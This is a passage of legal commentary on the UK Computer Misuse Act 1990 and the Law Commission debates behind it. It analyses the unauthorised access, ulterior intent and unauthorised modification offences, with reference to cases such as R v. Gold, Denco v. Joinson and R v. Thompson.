The Scottish and English Law Commissioners disagreed on the question whether unauthorised access should be criminalised. The Law Commission, which in their initial Working Paper had expressed doubt on the point, explained in their final Report that they had changed their opinion following confidential briefings from computer users. These indicated that even though a hacker may not have been acting with any ulterior motive, the conduct could cause serious loss to the user. In the event that it was discovered that an unauthorised party had obtained access to a computer system, it was argued, would very likely be unaware of the extent of the penetration and of any changes which may have been made to the contents of the system. Even inadvertently, an unauthorised user might cause the corruption or erasure of programs or data held on the system whilst the possibility that deliberate harm, involving perhaps the insertion of logic bombs or the introduction of a computer virus could never be discounted. A user faced with evidence of unauthorised access would have to assume the worst. In an example cited to and by the Law Commission a user expended some 10,000 hours of staff time rebuilding a computer system on becoming aware that an unauthorised person had obtained access. Faced with such evidence, the Law Commission recommended that the act of obtaining unauthorised access should be criminalised.
Such an approach raises a number of issues of principle which serve to illustrate yet more of the difficulties which the law faces in attempting to regulate aspects of computer related conduct. It has been argued on a number of occasions in this work that the law fails to take adequate account of the fact that intangible property is as valuable an asset as any more tangible commodity. If comparison is made with other forms of property and behaviour it will be seen that the effect of the Law Commission's recommendation is to confer an exalted status upon data held in a computer system. Save under the provisions of the Official Secrets Acts, if confidential information is written on a piece of paper which is left on top of a desk visible through a window, no offence would be committed by a person who looked at the document through the window. No offence indeed would be committed by a person who took a photograph of the document and its contents. Although the situation may be less certain, it is possible that a similar conclusion would apply where a document is left in an unlocked office or house and a unauthorised person entered the premises to read or photograph it. There may, of course, be legal ramifications under the law of copyright, but no criminal offence will be committed. As a general rule, the mere act of obtaining access to property does not constitute an offence. This occurs only where security measures are overcome or where property is damaged or removed.
The argument that criminal sanctions should be imposed because a computer user is put to expense because of a feeling of apprehension that damage may have occurred also appears to lack precedent. If a house owner becomes aware that house keys have disappeared for a period of time and then reappeared, they may well be concerned that an unauthorised party has copied the keys. A reasonable response to this fear might see locks being changed at not inconsiderable expense and inconvenience. Assuming that the person responsible for the keys removal is discovered and that it transpires that no copy was made, it may be doubted whether any criminal offence has been committed. A more extreme example might see an airline becoming aware that an unauthorised party has accessed a plane's engines. If the response were to be other than grounding the plane pending exhaustive checks, it is likely that the airline would be considered negligent. Again, if it transpired that no damage had been caused, the expense and inconvenience caused would not of itself give rise to any criminal sanctions.
The Computer Misuse Act draws almost entirely upon the Law Commission's Report. Although the legislation applies to Scotland, the work of the Scottish Law Commission was disregarded under the explanation that the rapid pace of change in computer related fields lent extra authority to the more recent deliberations of the English body. Given the radical differences between the two reports and the fact that they were separated by less than 2 years in time, this explanation may not present an optimistic prognosis for the effectiveness of the 1990 Act.
The legislation creates three new offences. Section one renders criminal the attempt to obtain unauthorised access to programs or data held on a computer. Section three applies in the situation where the contents of a computer system are subjected to an unauthorised modification. Section two attempts to deal with another aspect of computer related behaviour, namely the speed with which conduct can move from preparation to perpetration. Under the normal law of criminal attempts, a person can only be charged with an attempted offence when they move beyond the stage of preparing to commit an offence to that of attempting to put the plans into practice. The dividing line between preparation and perpetration has always proved a difficult one to draw but the argument was accepted by the Law Commission that the speed with which operations might be accomplished using a computer was such as to justify bringing forward the moment in time at which a serious criminal offence is committed. The calculation has been cited earlier that the foreign currency reserves could be transferred electronically in 15 minutes. Attempting to discover the combination of a bank safe is some way removed from the attempt to stage a robbery. Attempting to discover the codes and combinations used to effect an electronic fund transfer may leave the party involved with only a minor amount of work to do in order to complete the criminal scheme. The attempt to discover the codes might be considered as analogous to the attempt to use the knowledge of the combination to open the safe in the more old fashioned example.
Although the above example provides reasonable justification for legislative intervention, a further hypothesis advanced by the Law Commission reveals a difficulty associated with ad hoc and computer specific legislation. This example concerned the situation when a hacker attempted to gain access to the computerised medical records of patients suffering from the AIDS virus with the intention of using the information acquired for blackmail purposes. The Commission postulated that at the stage of attempting to obtain access, the scheme would not have advanced sufficiently to found a charge of attempted blackmail. Accepting that this is the case, the question may be put how far the involvement of the computer serves to change anything. In the banking example cited above, it is clear that the computerised robber is enabled to advance the criminal scheme to a greater extent than his or her traditional counterpart. The computerised blackmailer secures no similar advantage. As has been said in the context of the Data Protection Act, the fact of the computer's involvement is purely fortuitous.
Section one provides that a person shall be guilty of an offence if:
(a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer;
(b) the access he intends to secure is unauthorised; and
(c) he knows at the time when he causes the computer to perform the function that this is the case.
Commission of the unauthorised access offence attracts a maximum penalty of a six month term of imprisonment and a fine of [[sterling]]2,000. This amount is twice that recommended by the Law Commission.
A number of features of the offence call for comment. In common with the generally adopted approach, no attempt is made to define the word computer. Given the proliferation of micro-processors in every day appliances such as motor cars, washing machines and video recorders the ambit of the legislation is exceptionally broad.
The two key element of the definition are the requirement that the attempt be made to cause a computer to perform a function with the intention that this should enable access to be secured to any program or data stored in it. These phrases are themselves the subject of extensive definitions. Effectively, any action which causes the computer to operate in any way will come within the scope of section one. In particular, access will be obtained to a program held in a computer when the program operates. It is not necessary that the user should see the program in question or that its operation should be internal to the computer. An example might concern a washing machine controlled by micro-processors. Any person using the washing machine would cause their operation, thereby obtaining access to the programs involved. If the use of the machine was unauthorised, a section one offence might be committed. Such a conclusion has to be set alongside the general rule that unauthorised use of an object is not, per se, criminal.
An offence will only be committed if the party seeking access knows that his or her efforts are unauthorised. Paradoxically, this may be more readily established in the case of unauthorised use of a washing machine than of a computer. The question whether access is unauthorised will be determined by reference to the state of mind of the computer owner or of the person entitled to control access. In the case of computerised library catalogues where terminals are located throughout the library it is likely to be the case that access is authorised to the world at large - or at least that portion entitled to enter the library. In other cases, the user may wish to authorise much more limited access and it may well be that the intention would be that no other person should be authorised to use the equipment. It should be stressed that decisions are to be made by a person entitled to control access. If a person is allocated a password allowing access to the system and reveals details of this to a third party thereby enabling them to obtain access, that access will be unauthorised as the party disclosing the necessary information is not authorised to control access. Instances have been reported of computer bulletin boards displaying details of telephone numbers and passwords enabling access to be obtained to specific systems. The fact that the details are genuine will not make any subsequent use authorised.
The intention of the user is only one element of the statutory equation. In order to secure a conviction it must be established that an accused knew that his or her access was unauthorised. In the situation where access is obtained to the physical components of a computer, e.g. the user sits in front of and uses a keyboard attached to the computer, the question whether knowledge that access is unauthorised will be closely linked that whether the presence on the premises involved was authorised. Matters may not be resolved so simply when access is obtained remotely. This is more in line with the stereotypical view of hackers. The evidentiary burden of establishing knowledge that access was unauthorised is a heavy one. The fact that a party should have suspected that their attentions were unwanted would not suffice. Given the lack of case law under the 1990 Act any comment in this area must be speculative but the scenario will be considered in which a hacker has been given a telephone number corresponding with a computer system and connects to the system. At that stage it is most unlikely that an offence will be committed under section one. The first point of contact with a computer system is normally via a 'log in' screen. This will normally identify the system. At this stage the hacker may suspect that they are not authorised to make use of the system but suspicion may fall short of knowledge. It may well be that the log in screen will also make reference to the provisions of the Computer Misuse Act and state specifically that unauthorised access constitutes a criminal offence. It may well be that the inclusion of such a warning will suffice to establish the guilt of a person who has no access right but who seeks to move from the log in screen to explore the contents of the system itself.
Few computer systems of any significance will rely only upon warning notices as means for keeping unauthorised users at bay. In the same way as a house-owner will use locks and possibly burglar alarms, so security precautions will be built into the system. Typically, these involve allocating passwords to authorised users and requiring these to be inserted prior to allowing access to proceed. Although it may be likely that sight of a demand for a password should signify to a user that their presence is unauthorised, in some cases the requirement for a password is a matter of form rather than substance. Some systems will allow a user to obtain access using a password such as "guest" or "anonymous". Other systems (or system managers) impose very lax control over the choice of passwords. In the case of Denco v. Joinson, for example, a Welsh employee selected the password "Taff". In the seminal case of R v. Gold, the access information discovered by the accused was in two stages. First came a password which in this case consisted of the number 2 repeated eight times. This required to be followed by a user identification code which used the number 1234.
The difficulty of establishing knowledge will be even greater when a user possess limited access rights but where the allegation is that these have been exceeded. Typically, this may occur in an employment relationship. In Denco v. Joinson for example, the appellant had been granted limited access to the computer system in connection with his employment as a metal worker but allegedly sought to access information relating to the firm's customers, information which fell outwith the scope of his access rights. The appellant's conduct in this case was compounded by the fact that he had made use of a password allocated to another employer. The computer culture existing within the workplace may be a matter of some importance in this respect. It was reported in Denco that in the initial stages of computerisation, management encouraged employees to make use of the computer even though this was not required for the performance of their duties. In such a climate, it might be difficult to establish the requisite knowledge.
The decision to make unauthorised access an offence has been criticised as marking an unwarranted extension to the criminal law. In practice, the manner in which it has been implemented in the Computer Misuse Act may render the issue of little practical importance The most difficult issue occurs when a user displays clear and unequivocal notices warning that unauthorised users are not welcome but takes no further security measures to prevent access. In such a situation, an offence may well be committed under the Act but it is difficult to reconcile this situation with the doomsday scenarios postulated by the Law Commission in which users, fraught with concern at the possible damage caused by intruders, incur enormous expenditure in rebuilding the system. The fact that users have been lax in incorporating or applying security precautions should not be seen as grounds for refusing protection. The fact that a lock can be forced easily does not provide any defence for a party so acting. By extending so wide the scope of the prohibition, the Act may protect those who might be considered little deserving but by imposing the requirement of establishing knowledge may deny protection to those whose genuine attempts at maintaining security are defeated by conduct which may fairly be stigmatised as negligent or reckless but which might not readily be characterised as intentional. The issue will always be one of fact, but it may be difficult to ascribe knowledge to a hacker who was given access details by a friend or even found them on a bulletin board.
A person is guilty of an offence under this section if he commits an offence under section 1 above (the unauthorised access offence) with intent-
(a) to commit an offence to which this section applies; or
(b) to facilitate the commission of such an offence (whether by himself or any other person).
The offences referred to in paragraph (a) are those for which a term of imprisonment of 5 or more years might be imposed upon a person with no previous criminal record.
Commission of the unauthorised access offence is a pre-requisite for commission of the ulterior intent offence. This may serve to limit the practical utility of the new provision. Over the last decade, the Audit Commission have conducted triennial surveys attempting to discover the extent of the losses resulting from computer fraud and other forms of computer misuse. In most of the cases reported to them, the losses resulted from internal causes. Although not included in these surveys, the case of R v. Thompson might be regarded as indicative of the behaviour involved.
Thompson was employed as a computer programmer by a bank in Kuwait. His work gave him access to the computer systems which held details of customers' accounts. Thompson devised a fraudulent scheme which involved programming the computers to transfer sums from such accounts into other accounts which he had opened in his own name. In an effort to avoid detection the transfers were not to be effected until Thompson had left the banks employ and was literally on a plane returning to England. Upon his return, Thompson attempted to realise his gains by causing the apparent contents of his accounts to be transferred to another account which he had opened with an English bank. It was at this point that his conduct was discovered and Thompson was charged with obtaining property by deception.
The major legal point in this case concerned the question whether the English courts had jurisdiction in the matter, Thompson arguing that any offence had been committed in Kuwait. Rejecting this claim, the Court of Appeal held that the offence was committed only when Thompson secured control of the funds involved. Merely causing a credit balance to appear on his bank accounts did not suffice.
The facts in Thompson indicate the justification for the ulterior intent offence. Although a conviction was obtained, the effect of the decision would be to leave a bank vulnerable - or at least denied the protection of significant elements of the criminal law - until a fraudulent scheme was within seconds of completion. The difficulty might be to determine that Thompson, or any other employee in a similar position, had committed the unauthorised access offence. A distinction exists between unauthorised access and unauthorised use of access. Although much will once again depend upon the facts of a particular case, it may be difficult to establish that an authorised user has stepped sufficiently far outside any access rights as to commit the unauthorised access offence.
In the situation where the unauthorised access offence is committed with the requisite ulterior intent, this latter offence will also be committed even though it should transpire that it would be impossible to commit the later offence. An example might concern a person attempting to obtain access to codes or passwords used by a bank to authenticate electronic fund transfers without realising that further security measures would mean that possession of these items of information would not suffice to cause a transfer to be made.
The world-wide nature of telecommunications facilities brings a significant international dimension into all aspects of computer related conduct. In terms of the jurisdiction of the United Kingdom authorities, the basic provision is that jurisdiction may be claimed either when the party involved or the victim computer system is located within a domestic jurisdiction. This poses comparatively few definitional problems concerning the unauthorised access offence or with the unauthorised modification offence which will be considered in more detail below. Matters are not so straightforward where the conduct which allegedly constitutes the ulterior intent offence possesses an international dimension. The case of Thompson again provides an apposite illustration of such a situation. The approach adopted in the Computer Misuse Act is to confer jurisdiction upon the relevant domestic tribunals both where all aspects of the conduct occur within the jurisdiction and where it is intended to commit the further offence in some other jurisdiction subject to the condition that the conduct would be regarded as possessing a sufficient element of criminality in the relevant legal system. In cases of fraud or theft it is likely that these requirements will be satisfied almost regardless of where the conduct is envisaged to occur. The position may be more complicated where the further offence relates to damage to data, perhaps by disseminating a computer virus. It will be recalled that the Law Commission expressed concern at the problems encountered in the application of the existing provisions of the Criminal Damage Act. Where other jurisdictions have not enacted any form of computer misuse statute, it may be that difficulties will be encountered in establishing that the conduct is regarded as criminal in the jurisdiction involved.
In order to commit the offence it is not necessary that a party makes any form of contact with a computer. A person who creates a computer virus and puts it into circulation will, assuming the necessary intention can be established, commit the unauthorised modification offence in respect of each computer system affected.
Few would dispute the validity of the attempt to impose criminal sanctions upon those who seek deliberately to impair the operations of a computer system. As stated above, programs and data are protected under the Computer Misuse Act only whilst they are stored in a computer system. It is arguable that the provision is framed sufficiently broadly to encompass forms of activity which would not normally be considered as criminal. The example might be cited of a person who types a personal letter using a word processing system belonging to his or her employer. By adding data to the contents of the system, a modification is undoubtedly being performed. The user must be taken to have intended to make such a modification. It is immaterial for the purposes of the Act whether the modification is permanent or merely temporary. All that remains is the question whether the modification has impaired the operation of the computer system. The answer to this may depend upon the nature of the computer system and the fact whether the employee causes a copy of the letter to be retained on the system. In general, however, the more data is held on a computer, the slower will be its functioning - even though the diminution in performance may not be perceptible to an ordinary user. The Act does not require that impairment be significant and, in principle, there would appear no reason why a charge should not be brought in such an instance. Given that mere use of property is not generally regarded as constituting a criminal offence, the effect may again be to put a computer owner in a specially protected position.
Responsibility for criminal matters has traditionally been regarded as a national matter. Even the European Union's reach, for example, does not extend into the sphere of criminal law. Cyberspace, however, is no respected of national boundaries, The examples cited above indicate that as in other areas of law, there is urgent need for international co-operation and co-ordination. The comments of the Home Affairs Committee indicate that this may be no simple task.